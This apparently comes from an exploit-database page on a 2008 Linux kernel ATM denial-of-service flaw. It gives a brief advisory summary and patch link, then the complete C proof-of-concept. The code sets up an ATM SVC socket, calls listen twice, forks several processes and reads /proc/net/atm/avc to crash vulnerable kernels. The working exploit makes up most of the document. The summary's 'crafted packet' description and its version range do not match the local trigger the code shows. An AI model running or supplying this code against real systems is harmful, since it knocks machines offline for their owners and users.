Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Denial of service Exploit

vendor:

Linux Kernel

by:

Adurit team >>djekmani4ever

7.8

CVSS

HIGH

Denial of Service

CWE

Product Name: Linux Kernel

Affected Version From: 2.6.27.7-generic

Affected Version To: 2.6.24-1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2008

Linux Kernel 2.6.27.7-generic – 2.6.18 – 2.6.24-1 Denial of service Exploit

A denial of service vulnerability exists in Linux Kernel versions 2.6.27.7-generic, 2.6.18, and 2.6.24-1. An attacker can exploit this vulnerability by sending a crafted packet to the target system, causing the system to crash. This vulnerability is due to a lack of proper validation of user-supplied input when handling ATM packets. An attacker can exploit this vulnerability to crash the target system, resulting in a denial of service condition.

Mitigation:

Apply the patch from http://marc.info/?l=linux-netdev&m=122841256115780&w=2

Source

Exploit-DB raw data:

/*

Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Denial of service Exploit

Vuln : 2.6.27.7-generic || 2.6.18 || 2.6.24-1

Author : Adurit team
             >>djekmani4ever

Home : Hightsec.com

patch : http://marc.info/?l=linux-netdev&m=122841256115780&w=2

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h> 
                      
#define NUM_CPUS 8    
#define ATM "/proc/net/atm/avc"
                              
int                           
main(void)                    
{                             
    char *err, adurit[2000];  
    int i, ret, sock, proc;   
    struct atm_qos dj;        
    struct sockaddr_atmsvc addr;
                               
                               
                               
    sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
                                           
                                           
    memset(&dj, 0, sizeof(dj));            
    dj.rxtp.traffic_class = ATM_UBR;       
    dj.txtp.traffic_class = ATM_UBR;       
    dj.aal = ATM_NO_AAL;                   
                                           

    ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &dj, sizeof(dj));
    if (ret == -1) {
        printf("failed !\n");
        return 1;
    }
    memset(&addr, 0, sizeof(addr));
    addr.sas_family = AF_ATMSVC;
 
    bind(sock, (struct sockaddr *) &addr, sizeof(addr));
 
    listen(sock, 10);
    listen(sock, 10);

    for (i = 1; i < NUM_CPUS; ++i) {
        if (fork() != 0) {
            break;
        }
    }
    proc = open(ATM, O_RDONLY);
    ret = read(proc, &adurit, 2000);
    close(proc);

    return 0;
}

// milw0rm.com [2008-12-14]